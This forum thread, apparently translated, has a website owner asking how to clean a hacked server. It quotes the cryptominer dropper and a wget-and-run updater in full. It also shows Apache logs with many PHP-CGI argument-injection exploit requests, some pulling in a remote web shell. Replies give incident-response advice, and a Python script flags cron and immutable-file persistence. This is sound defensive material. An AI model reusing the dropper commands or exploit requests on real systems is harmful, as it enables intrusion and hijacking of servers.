Help against a "hacking attack"

Hello everyone,
I had a hacker attack on my website; here is the code:

[code]#!/bin/sh
crontab -r
cd /tmp
rm -rf a* c* update*
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
wget http://europay24.info/update >> /dev/null &&
chmod u+x update
rm -rf /etc/cron.hourly/update

cp update /etc/cron.hourly/
chattr -ia bash
chattr -ia *
wget http://europay24.info/clamav
wget http://europay24.info/sh
chmod +x sh
chmod +x clamav
mv clamav bash
kill -9 `ps x|grep miner|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep stratum|grep -v grep|awk '{print $1}'`
PATH="." bash -o stratum+tcp://216.230.103.42:3333 -O geox.1:x -B
PATH="." sh -o stratum+tcp://216.230.103.42:3333 -O geox.1:x -B
chattr +ia bash
chattr +ia sh
[/code]
So,
how do I remove this attack from my server?

Installed software: apache2, mysql 5, phpmyadmin

If an attacker got that far into your system (to do all of that he needs to be root), then your machine is too compromised to be salvageable.
Even if you cleaned up everything you can find, nothing guarantees that you would really clean up everything.

You won't like this, but compromised machine = back up the important data, full wipe and reinstall. Before doing all that, though, it would be useful to identify the hole the attacker used to get in, so that it doesn't happen again on your fresh install...

  1. In /tmp you should have the files update, bash, clamav and sh. Look at their owner and move them away.

  2. You should have a suspicious /etc/cron.hourly/update script. Move it somewhere else and post the content of that script.

  3. Also look at the output of
     crontab -l
     when run as the owner of the /tmp/update files (see 1).

  4. Do an integrity check of the machine. For that, install debsums and run it.

  5. If it is a sensitive server, reinstall it; the above is mostly for learning. You also need to look at the logs and the command history, check the databases, check every running process, test for possible hidden processes and test for the presence of a rootkit. In short, there is work to do.

Edit: Syam, yes, but if the server must not be stopped, or simply if it is not ultra-sensitive and for the sake of learning, trying to salvage things can teach a lot.

As a prerequisite to fran.b's pedagogical method: change the root password and/or the passwords of the sudoers. Use a strong password.

To look for rootkits, rkhunter could be worthwhile. Otherwise +1 to fran.b: analysing how the script works is a good lead for finding out what the thing does.

Identifying the means by which the machine was accessed in this way would be worthwhile. SSH access allowed for root + weak password? I don't know much about it, but fail2ban can help counter brute-force attacks.

Most likely via the website; the files under /tmp should belong to www-data.

The chattr +ia prevents any modification or deletion of these files, which should be found under /tmp again after a reboot.
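The checks in fran.b's steps 1 to 3 and the chattr +ia remark above can be scripted against evidence copied off the box. The following Python script is an added example, not code from the thread: it takes the text output of `crontab -l` and `lsattr -a` (constructed sample output is embedded, modelled on the `* * * * * $dir/update >/dev/null 2>&1` entry and the `chattr +ia bash` / `chattr +ia sh` lines of the dropper) and flags the persistence indicators the thread describes: cron entries that run something from /tmp or the web root every minute (or at boot) with their output silenced, and files in those directories carrying the immutable or append-only attribute. The directory list and the reason strings are my own assumptions.

```python
"""Triage of cron and file-attribute persistence, as described in this thread.

Added example (not from the thread). Input is plain text, e.g. the saved
output of `crontab -l` for each user and `lsattr -a` on /tmp and /var/www,
so the checks can run on a copy of the evidence rather than on the live box.
"""
import re

# Directories from which a legitimate cron job should not normally run
# (assumption; extend for the layout of the server being examined).
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/var/www")

# Five schedule fields followed by the command (user crontab format).
CRON_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.*)$")

# Constructed sample input, modelled on the dropper's `cron.d` file.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * /var/www/update >/dev/null 2>&1
"""

# Constructed sample `lsattr -a` output: 'i' = immutable, 'a' = append-only,
# the flags the dropper sets with `chattr +ia bash` / `chattr +ia sh`.
SAMPLE_LSATTR = """\
----i---------e-- /tmp/bash
-----a--------e-- /tmp/sh
--------------e-- /tmp/mech.dir
--------------e-- /var/www/index.html
"""


def check_crontab(text):
    """Return [(line, [reasons])] for crontab entries worth a second look."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                  # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:
            m = CRON_RE.match(line)
            if not m:
                continue
            schedule, command = m.groups()
        reasons = []
        if schedule == "* * * * *":
            reasons.append("runs every minute")
        if schedule == "@reboot":
            reasons.append("runs at boot")
        if any(d in command for d in SUSPECT_DIRS):
            reasons.append("command lives in a temp or web directory")
        if re.search(r">\s*/dev/null", command):
            reasons.append("output silenced")
        if reasons:
            findings.append((line, reasons))
    return findings


def check_lsattr(text):
    """Return [(path, [attributes])] for immutable/append-only files under SUSPECT_DIRS."""
    findings = []
    for raw in text.splitlines():
        parts = raw.split(None, 1)
        if len(parts) != 2:
            continue
        flags, path = parts
        if not path.startswith(SUSPECT_DIRS):
            continue
        attrs = [name for ch, name in (("i", "immutable"), ("a", "append-only"))
                 if ch in flags]
        if attrs:
            findings.append((path, attrs))
    return findings


def triage(crontab_text, lsattr_text):
    """Combine both checks into one report dictionary."""
    return {"cron": check_crontab(crontab_text),
            "attributes": check_lsattr(lsattr_text)}


if __name__ == "__main__":
    report = triage(SAMPLE_CRONTAB, SAMPLE_LSATTR)
    for line, reasons in report["cron"]:
        print("CRON  %-45s %s" % (line, "; ".join(reasons)))
    for path, attrs in report["attributes"]:
        print("ATTR  %-45s %s" % (path, ", ".join(attrs)))
```

On a real box, feed it `crontab -l -u <user>` for every account (the dropper installs the entry under whichever user Apache runs as, typically www-data) and `lsattr -a /tmp /var/www`; a file that shows up as immutable cannot be removed until `chattr -ia` is run on it, which is exactly why the script sets that flag.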

Hello everyone,
thank you for your replies, and please excuse my late answer.
I am trying to repair my server first before formatting it, because there is a lot of software installed, in particular GAMMU.

[quote]1) In /tmp you should have the files update, bash, clamav and sh. Look at their owner and move them away.[/quote]
There are none of these files in /tmp, nor anywhere else; the hacker already deleted them.

[quote]cd /tmp
rm -rf a* c* update*[/quote]
On the other hand, these files are present in /www:
mech.dir

update

[quote]#!/bin/sh
plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'`
if [ "$plm" != "" ]
then echo "MERGE!!!"
else
nohup wget 82.165.130.162/a && sh a >> /dev/null &
fi
[/quote]
cron.d

[quote]* * * * * /var/www/update >/dev/null 2>&1
[/quote]
and the bash file is attached.

[quote]/etc/cron.hourly[/quote] is empty.

Syam, according to my research the hole was in cgi-bin.

Excerpt from the log files:

apache/access.log

[quote]81.2.197.141 - - [18/Nov/2013:14:39:17 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 301 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
2.100.158.26 - - [18/Nov/2013:15:55:07 +0300] "9\xd2\t\x91\xfb\xa4\t\x05\xf3N*\xeeVs\xbc)\xa5(\x89lRgp\xa3\x0e" 400 506 "-" "-"
5.15.26.215 - - [18/Nov/2013:19:43:57 +0300] "m\b\x9aP\xd9\x16\xb8n\xe5%{\xd50\xf4\x1e\x94/2\xf8\x8e\xe8\xfdI\xad\xb6\x89L\xcd\x93\x94\xbe5n\x03\xe9K" 200 1397 "-" "-"
94.102.63.245 - - [19/Nov/2013:00:46:58 +0300] "GET /cgi-bin/php HTTP/1.0" 500 829 "-" "-"
82.221.102.181 - - [21/Nov/2013:17:33:35 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 "-" "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:34:46 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 "-" "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:39:01 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 200 10338 "-" "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:41:22 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 "-" "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:46:00 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0" 500 229 "-" "-"
82.221.102.181 - - [21/Nov/2013:17:47:48 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0" 500 229 "-" "-"
82.221.102.181 - - [21/Nov/2013:17:48:49 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0" 500 229 "-" "-"
82.221.102.181 - - [21/Nov/2013:18:31:31 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff+-dsuhosin.simulation%3Don+-ddisable_functions%3D%22%22+-dopen_basedir%3Dnone+-d+cgi.force_redirect%3D0+-dcgi.redirect_status_env%3D0+-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1" 200 10341 "-" "curl/7.32.0"
94.102.56.237 - - [22/Nov/2013:00:15:52 +0300] "GET /cgi-php HTTP/1.0" 404 483 "-" "-"
94.102.56.237 - - [22/Nov/2013:00:48:51 +0300] "GET /cgi-php5 HTTP/1.0" 404 484 "-" "-"
50.116.50.35 - - [22/Nov/2013:00:44:26 +0300] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 504 508 "-" "-"
94.102.56.237 - - [22/Nov/2013:01:22:08 +0300] "GET /cgi-php4 HTTP/1.0" 404 484 "-" "-"
80.28.121.52 - - [22/Nov/2013:02:19:20 +0300] "HEAD / HTTP/1.0" 200 386 "-" "-"
80.28.121.52 - - [22/Nov/2013:02:19:20 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 500 833 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:13 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 500 833 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:17 +0300] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:18 +0300] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:19 +0300] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
189.36.12.66 - - [22/Nov/2013:03:30:47 +0300] "GET /manager/html HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
94.102.56.237 - - [22/Nov/2013:04:31:57 +0300] "GET /cgi-bin/php HTTP/1.0" 500 829 "-" "-"
94.102.56.237 - - [22/Nov/2013:05:05:03 +0300] "GET /cgi-bin/php5 HTTP/1.0" 500 829 "-" "-"
94.102.56.237 - - [22/Nov/2013:05:38:07 +0300] "GET /cgi-bin/php4 HTTP/1.0" 404 488 "-" "-"
1.234.31.127 - - [22/Nov/2013:06:40:17 +0300] "HEAD / HTTP/1.0" 200 386 "-" "-"
1.234.31.127 - - [22/Nov/2013:06:40:18 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 538 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
1.234.31.127 - - [22/Nov/2013:06:50:22 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 538 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [22/Nov/2013:12:45:24 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin1.448420E-316simulation%3Don+-d+disable_functions%3D+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp0X0.07FFFEF42B6AP-10220.0000000.000000192.151.144.2340.000000lurk.txt+-d+cgi1.020451E-314force_redirect%3D0+-d+cgi1.396073E-316redirect_status_env%3D0+-n HTTP/1.0" 500 829 "-" "-"
94.102.56.237 - - [22/Nov/2013:12:47:56 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin2.260321E-316simulation%3Don+-d+disable_functions%3D+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp0X0.07FFF142588DP-10220.0000000.000000192.151.144.2340.000000lurk.txt+-d+cgi1.020451E-314force_redirect%3D0+-d+cgi2.239255E-316redirect_status_env%3D0+-n HTTP/1.0\r\n\r\n" 500 829 "-" "-"
210.245.23.136 - - [22/Nov/2013:16:12:19 +0300] "HEAD / HTTP/1.0" 200 386 "-" "-"
210.245.23.136 - - [22/Nov/2013:16:12:20 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 500 833 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:16:59 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 538 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:27:07 +0300] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:27:09 +0300] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [22/Nov/2013:17:47:29 +0300] "GET /cgi-bin/php HTTP/1.0" 500 829 "-" "-"
80.82.78.9 - - [22/Nov/2013:17:57:23 +0300] "POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1" 200 325 "-" "-"
